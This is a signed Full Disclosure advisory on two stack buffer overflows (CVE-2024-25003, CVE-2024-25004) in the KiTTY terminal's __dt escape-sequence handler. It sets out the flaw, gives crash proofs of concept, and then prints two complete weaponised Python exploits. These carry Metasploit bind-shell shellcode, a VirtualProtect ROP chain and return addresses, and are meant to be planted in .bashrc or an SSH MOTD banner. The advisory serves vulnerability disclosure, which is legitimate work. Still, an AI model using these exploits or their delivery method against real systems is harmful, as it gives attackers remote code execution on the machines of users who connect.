-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname
(CVE-2024-25003) & Username (CVE-2024-25004) Variables
=================================================================================================================================
Contents:
---------
Summary
Analysis
Exploitation
Acknowledgments
Timeline
Additional Advisory
Summary:
--------
Austin A. DeFrancesco (DEFCESCO) discovered two stack-based buffer overflow
vulnerabilities in KiTTY (https://github.com/cyd01/KiTTY/). These
vulnerabilities:
- Are exploitable by any KiTTY user connecting to a host with the embedded
exploit;
- The vulnerabilities were introduced in the original release in May 2021
(commit 4f79b1e) and affect all versions up to KiTTY ≤ 0.76.1.13 in their
default configuration.
Austin developed an exploit for these vulnerabilities and obtained remote code
execution in the context of the user running the application; by default, KiTTY
can be operated in the user permission group of Standard Users. These exploits
are stable and repeatable on all Microsoft Windows operating systems
11/10/8/7/XP.
Analysis:
---------
CVE-2024-25003 and CVE-2024-25004 buffer overflow vulnerabilities are in
`kitty.c`. The vulnerable lines of code are on lines `2597-2602`; in the latest
revision `75fa2abcd220c172`
(https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2597-L2602).
If KiTTY encounters the ANSI escape sequence `\\033]0;__dt` in a stream, it
interprets it as an instruction to create a duplicate terminal session:
- `\\033`: This is the escape character (octal representation of ASCII ESC),
which signals the beginning of an escape sequence.
- `]0;`: This sequence part indicates a metacommand will be defined.
- `__dt`: This is the vulnerable KiTTY command to duplicate the terminal,
which takes inputs of hostname and username.
- `\\077`: This is the terminator sequence to indicate the end of the escape
sequence.
- KiTTY’s `kitty.c` `__dt` command checks if the first three characters of
the string `cmd` are `d`, `t`, and `:`, respectively.
If the condition is true (at line 2596), an array `host` and `user` will be
declared with a size of 1024 and 256 (at line 2597), respectively, and
initialized with an empty string.
CVE-2024-25003, where the hostname is vulnerable to a stack-based buffer
overflow, occurs due to insufficient bounds checking and input sanitization (at
line 2600). This allows an attacker to overwrite adjacent memory, which leads
to arbitrary code execution.
CVE-2024-25004, where the username is vulnerable to a stack-based buffer
overflow, occurs due to insufficient bounds checking and input sanitization (at
line 2600). This allows an attacker to overwrite adjacent memory, which leads
to arbitrary code execution.
Because `RemotePath` is created from a size calculated at runtime, `RemotePath`
is not vulnerable to an overflow. It should be noted that `RemotePath` may be a
`NULL` pointer if the allocation fails.
1. `strcpy(host, cmd + 3);` copies the substring of `cmd` starting from the
4th character (index 3) into the `host` array (at line 2601).
2. `i = poss(":", host);` assumes there’s a function `poss` that finds the
position of the `:` character in the `host` string and assigns it to the
variable `i` (at line 2601).
3. `strcpy(user, host + i);` copies the substring of `host` starting from the
position after `:` into the `user` array (at line 2602).
2596 if( (cmd[0]=='d')&&(cmd[1]=='t')&&(cmd[2]==':') ) { // __dt: start a
duplicated session in same directory, same host and same user : dt() { printf
"\033]0;__dt:"$(hostname)":"${USER}":"`pwd`"\007" ; } 2597 char
host[1024]="";char user[256]=""; 2598 int i; 2599 if( RemotePath!= NULL ) free(
RemotePath ) ; 2600 RemotePath = (char*) malloc( strlen( cmd ) - 2 ) ; 2601
strcpy(host,cmd+3);i=poss(":",host); 2602 strcpy(user,host+i);
Exploitation:
-------------
### __dt Hostname & Username Buffer Overflows:
From an attacker’s point of view, the exploits for CVE-2024-25003 and
CVE-2024-25004 can be inserted into the `.bashrc` file for all users or in the
SSH warning/message of the day (MOTD) banner. The exploit(s) will trigger once
the user logs in or is presented with the SSH warning/MOTD banner.
HOSTNAME CRASH:
(47c.23ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=861615a9 edx=01130000 esi=41414141
edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0 nv up ei pl nz na po
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010202
41414141 ?? ???
USERNAME CRASH:
(af8.ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=02f92491 edx=01120000 esi=41414141
edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0 nv up ei pl nz na po
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010202
41414141 ?? ???
KiTTY’s `__dt` function crashed (at line 2601) because adjacent memory was
overwritten.
To reproduce the vulnerability, follow these steps:
1. Start KiTTY and start an SSH session.
2. Save the proof of concept (PoC) on the connected SSH session.
3. Execute the PoC(s) using Python: `python3 developer_CVE-2024-25003.py` or
`python3 developer_CVE-2024-25004`.
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start
#
# Duplicated Session Hostname Variable (CVE-2024-25003)
#
# OS: Microsoft Windows 11/10/8/7/XP
#
# Author: DEFCESCO (Austin A. DeFrancesco)
#
# Software:
#
#
<https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>
#
#-------------------------------------------------------------------------------------#
import sys
import os
sequence = b'A' * 1309
escape_sequence = b'\\033]0;__dt:' + sequence + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start
#
# Duplicated Session Username Variable (CVE-2024-25004)
#
# OS: Microsoft Windows 11/10/8/7/XP
#
# Author: DEFCESCO (Austin A. DeFrancesco)
#
# Software:
#
#
<https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>
#
#-------------------------------------------------------------------------------------#
import sys
import os
sequence = b'A' * 1309
escape_sequence = b'\\033]0;__dt:localhost:' + sequence + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
### Exploits:
To reproduce these exploits, follow these steps:
1. Start KiTTY and start an SSH session.
2. Save the proof of concept exploit(s) on the connected SSH session.
3. Update the payload handler and payload documented in the exploit’s comments.
4. Execute the exploit(s) using Python: `python3 CVE-2024-25003.py` or
`python3 CVE-2024-25004.py`.
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start
#
# Duplicated Session Hostname Variable (CVE-2024-25003)
#
# OS: Microsoft Windows 11/10/8/7/XP
#
# Author: DEFCESCO (Austin A. DeFrancesco)
#
# Software:
#
#
<https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>
#
#-------------------------------------------------------------------------------------#
# More details can be found on my blog:
<https://blog.DEFCESCO.io/Hell0+KiTTY> #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler
#
# [*] Payload Handler Started as Job 1
#
# msf6 payload(windows/shell_bind_tcp) >
#
# [*] Started bind TCP handler against 192.168.100.28:4444
#
# [*] Command shell session 1 opened (192.168.100.119:39315 ->
192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b
'\\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40' -f py #
# windows/shell_bind_tcp - 375 bytes
#
# <https://metasploit.com/>
#
# Encoder: x86/xor_poly
#
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,
#
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,
#
# AutoVerifySession=true
#
#---------------------------------------------------------------------------------------------#
buf = b""
buf += b"\\x51\\x53\\x56\\x57\\xdb\\xd9\\xd9\\x74\\x24\\xf4\\x5f\\x41"
buf += b"\\x49\\x31\\xc9\\x51\\x59\\x90\\x90\\x81\\xe9\\xae\\xff\\xff"
buf += b"\\xff\\xbe\\xd4\\xa1\\xc4\\xf4\\x31\\x77\\x2b\\x83\\xef\\xfc"
buf += b"\\x51\\x59\\x90\\xff\\xc9\\x75\\xf3\\x5f\\x5e\\x5b\\x59\\x28"
buf += b"\\x49\\x46\\xf4\\xd4\\xa1\\xa4\\x7d\\x31\\x90\\x04\\x90\\x5f"
buf += b"\\xf1\\xf4\\x7f\\x86\\xad\\x4f\\xa6\\xc0\\x2a\\xb6\\xdc\\xdb"
buf += b"\\x16\\x8e\\xd2\\xe5\\x5e\\x68\\xc8\\xb5\\xdd\\xc6\\xd8\\xf4"
buf += b"\\x60\\x0b\\xf9\\xd5\\x66\\x26\\x06\\x86\\xf6\\x4f\\xa6\\xc4"
buf += b"\\x2a\\x8e\\xc8\\x5f\\xed\\xd5\\x8c\\x37\\xe9\\xc5\\x25\\x85"
buf += b"\\x2a\\x9d\\xd4\\xd5\\x72\\x4f\\xbd\\xcc\\x42\\xfe\\xbd\\x5f"
buf += b"\\x95\\x4f\\xf5\\x02\\x90\\x3b\\x58\\x15\\x6e\\xc9\\xf5\\x13"
buf += b"\\x99\\x24\\x81\\x22\\xa2\\xb9\\x0c\\xef\\xdc\\xe0\\x81\\x30"
buf += b"\\xf9\\x4f\\xac\\xf0\\xa0\\x17\\x92\\x5f\\xad\\x8f\\x7f\\x8c"
buf += b"\\xbd\\xc5\\x27\\x5f\\xa5\\x4f\\xf5\\x04\\x28\\x80\\xd0\\xf0"
buf += b"\\xfa\\x9f\\x95\\x8d\\xfb\\x95\\x0b\\x34\\xfe\\x9b\\xae\\x5f"
buf += b"\\xb3\\x2f\\x79\\x89\\xc9\\xf7\\xc6\\xd4\\xa1\\xac\\x83\\xa7"
buf += b"\\x93\\x9b\\xa0\\xbc\\xed\\xb3\\xd2\\xd3\\x5e\\x11\\x4c\\x44"
buf += b"\\xa0\\xc4\\xf4\\xfd\\x65\\x90\\xa4\\xbc\\x88\\x44\\x9f\\xd4"
buf += b"\\x5e\\x11\\x9e\\xdc\\xf8\\x94\\x16\\x29\\xe1\\x94\\xb4\\x84"
buf += b"\\xc9\\x2e\\xfb\\x0b\\x41\\x3b\\x21\\x43\\xc9\\xc6\\xf4\\xc5"
buf += b"\\xfd\\x4d\\x12\\xbe\\xb1\\x92\\xa3\\xbc\\x63\\x1f\\xc3\\xb3"
buf += b"\\x5e\\x11\\xa3\\xbc\\x16\\x2d\\xcc\\x2b\\x5e\\x11\\xa3\\xbc"
buf += b"\\xd5\\x28\\xcf\\x35\\x5e\\x11\\xa3\\x43\\xc9\\xb1\\x9a\\x99"
buf += b"\\xc0\\x3b\\x21\\xbc\\xc2\\xa9\\x90\\xd4\\x28\\x27\\xa3\\x83"
buf += b"\\xf6\\xf5\\x02\\xbe\\xb3\\x9d\\xa2\\x36\\x5c\\xa2\\x33\\x90"
buf += b"\\x85\\xf8\\xf5\\xd5\\x2c\\x80\\xd0\\xc4\\x67\\xc4\\xb0\\x80"
buf += b"\\xf1\\x92\\xa2\\x82\\xe7\\x92\\xba\\x82\\xf7\\x97\\xa2\\xbc"
buf += b"\\xd8\\x08\\xcb\\x52\\x5e\\x11\\x7d\\x34\\xef\\x92\\xb2\\x2b"
buf += b"\\x91\\xac\\xfc\\x53\\xbc\\xa4\\x0b\\x01\\x1a\\x34\\x41\\x76"
buf += b"\\xf7\\xac\\x52\\x41\\x1c\\x59\\x0b\\x01\\x9d\\xc2\\x88\\xde"
buf += b"\\x21\\x3f\\x14\\xa1\\xa4\\x7f\\xb3\\xc7\\xd3\\xab\\x9e\\xd4"
buf += b"\\xf2\\x3b\\x21"
def shellcode():
sc = b''
sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov ebx,0x44442444
sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov eax,0x44444444
sc += b'\\x29\\xD8' # sub eax,ebx
sc += b'\\x29\\xC4' # sub esp,eax
sc += buf
sc += b'\\x90' * (1052-len(sc))
assert len(sc) == 1052
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN
[kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # push esp; ret 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40
#
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :
#
# ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN
#
# ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE}
#
# Shellcode size at ESP: 1052
#
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX #
POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii
{PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\\x90' * 35
nops = b'\\x90' * 88
escape_sequence = b'\\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\\x90'
escape_sequence += b"\\xE9\\x2A\\xFA\\xFF\\xFF" #jmp $eip-1490
escape_sequence += nops + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start
#
# Duplicated Session Username Variable (CVE-2024-25004)
#
# OS: Microsoft Windows 11/10/8/7/XP
#
# Author: DEFCESCO (Austin A. DeFrancesco)
#
# Software:
#
#
<https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>
#
#-------------------------------------------------------------------------------------#
# More details can be found on my blog:
<https://blog.DEFCESCO.io/Hell0+KiTTY> #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler
#
# [*] Payload Handler Started as Job 1
#
# msf6 payload(windows/shell_bind_tcp) >
#
# [*] Started bind TCP handler against 192.168.100.28:4444
#
# [*] Command shell session 1 opened (192.168.100.119:34285 ->
192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b
'\\x00\\x07\\x0a\\x0d\\x1b\\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes
#
# <https://metasploit.com/>
#
# Encoder: x86/shikata_ga_nai
#
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,
#
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,
#
# AutoVerifySession=true
#
#-------------------------------------------------------------------------------------#
buf = b""
buf += b"\\xd9\\xe9\\xd9\\x74\\x24\\xf4\\xbd\\xfe\\xb7\\xa4\\x99\\x5e"
buf += b"\\x29\\xc9\\xb1\\x53\\x83\\xee\\xfc\\x31\\x6e\\x13\\x03\\x90"
buf += b"\\xa4\\x46\\x6c\\x90\\x23\\x04\\x8f\\x68\\xb4\\x69\\x19\\x8d"
buf += b"\\x85\\xa9\\x7d\\xc6\\xb6\\x19\\xf5\\x8a\\x3a\\xd1\\x5b\\x3e"
buf += b"\\xc8\\x97\\x73\\x31\\x79\\x1d\\xa2\\x7c\\x7a\\x0e\\x96\\x1f"
buf += b"\\xf8\\x4d\\xcb\\xff\\xc1\\x9d\\x1e\\xfe\\x06\\xc3\\xd3\\x52"
buf += b"\\xde\\x8f\\x46\\x42\\x6b\\xc5\\x5a\\xe9\\x27\\xcb\\xda\\x0e"
buf += b"\\xff\\xea\\xcb\\x81\\x8b\\xb4\\xcb\\x20\\x5f\\xcd\\x45\\x3a"
buf += b"\\xbc\\xe8\\x1c\\xb1\\x76\\x86\\x9e\\x13\\x47\\x67\\x0c\\x5a"
buf += b"\\x67\\x9a\\x4c\\x9b\\x40\\x45\\x3b\\xd5\\xb2\\xf8\\x3c\\x22"
buf += b"\\xc8\\x26\\xc8\\xb0\\x6a\\xac\\x6a\\x1c\\x8a\\x61\\xec\\xd7"
buf += b"\\x80\\xce\\x7a\\xbf\\x84\\xd1\\xaf\\xb4\\xb1\\x5a\\x4e\\x1a"
buf += b"\\x30\\x18\\x75\\xbe\\x18\\xfa\\x14\\xe7\\xc4\\xad\\x29\\xf7"
buf += b"\\xa6\\x12\\x8c\\x7c\\x4a\\x46\\xbd\\xdf\\x03\\xab\\x8c\\xdf"
buf += b"\\xd3\\xa3\\x87\\xac\\xe1\\x6c\\x3c\\x3a\\x4a\\xe4\\x9a\\xbd"
buf += b"\\xad\\xdf\\x5b\\x51\\x50\\xe0\\x9b\\x78\\x97\\xb4\\xcb\\x12"
buf += b"\\x3e\\xb5\\x87\\xe2\\xbf\\x60\\x3d\\xea\\x66\\xdb\\x20\\x17"
buf += b"\\xd8\\x8b\\xe4\\xb7\\xb1\\xc1\\xea\\xe8\\xa2\\xe9\\x20\\x81"
buf += b"\\x4b\\x14\\xcb\\xbc\\xd7\\x91\\x2d\\xd4\\xf7\\xf7\\xe6\\x40"
buf += b"\\x3a\\x2c\\x3f\\xf7\\x45\\x06\\x17\\x9f\\x0e\\x40\\xa0\\xa0"
buf += b"\\x8e\\x46\\x86\\x36\\x05\\x85\\x12\\x27\\x1a\\x80\\x32\\x30"
buf += b"\\x8d\\x5e\\xd3\\x73\\x2f\\x5e\\xfe\\xe3\\xcc\\xcd\\x65\\xf3"
buf += b"\\x9b\\xed\\x31\\xa4\\xcc\\xc0\\x4b\\x20\\xe1\\x7b\\xe2\\x56"
buf += b"\\xf8\\x1a\\xcd\\xd2\\x27\\xdf\\xd0\\xdb\\xaa\\x5b\\xf7\\xcb"
buf += b"\\x72\\x63\\xb3\\xbf\\x2a\\x32\\x6d\\x69\\x8d\\xec\\xdf\\xc3"
buf += b"\\x47\\x42\\xb6\\x83\\x1e\\xa8\\x09\\xd5\\x1e\\xe5\\xff\\x39"
buf += b"\\xae\\x50\\x46\\x46\\x1f\\x35\\x4e\\x3f\\x7d\\xa5\\xb1\\xea"
buf += b"\\xc5\\xd5\\xfb\\xb6\\x6c\\x7e\\xa2\\x23\\x2d\\xe3\\x55\\x9e"
buf += b"\\x72\\x1a\\xd6\\x2a\\x0b\\xd9\\xc6\\x5f\\x0e\\xa5\\x40\\x8c"
buf += b"\\x62\\xb6\\x24\\xb2\\xd1\\xb7\\x6c"
def shellcode():
sc = b''
sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov ebx,0x44442444
sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov eax,0x44444444
sc += b'\\x29\\xD8' # sub eax,ebx
sc += b'\\x29\\xC4' # sub esp,eax
sc += buf
sc += b'\\x90' * (1042-len(sc))
assert len(sc) == 1042
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN
[kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # PUSH ESP; RETN 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x9d
#
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :
#
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN
#
# ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
#
# Shellcode size at ESP: 1042 bytes
#
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX #
POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull
{PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\\x90' * 27
nops = b'\\x90' * 88
escape_sequence = b'\\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\\xE9\\x3D\\xFA\\xFF\\xFF' # jmp $eip-1471
escape_sequence += nops + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
Acknowledgments:
----------------
Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE
service requests.
Timeline:
---------
2024-01-08: This advisory contains one vulnerability and one additional
advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont;
no reply from Cyril.
2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to
Cyril Dupont; no reply.
2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).
Additional Advisory:
--------------------
CVE-2024-23749 Command Injection Vulnerability in KiTTY Get Remote File Through
SCP Input: https://blog.defcesco.io/CVE-2024-23749
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail
wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAACUTAP4oIK3jTlaYmcjg7f5yuEMXyOhRrs+SkR7PKd+eOeYlggEAmN3F
HN77fiaSDx9kM7Mqr+uS6M0crP1UO+ZbZGfTVQs=
=d91C
-----END PGP SIGNATURE-----
Attachment:
publickey - austin@defcesco.io - 0x4D9E1D34.asc
Description: application/pgp-keys
Attachment:
publickey - austin@defcesco.io - 0x4D9E1D34.asc.sig
Description: PGP signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/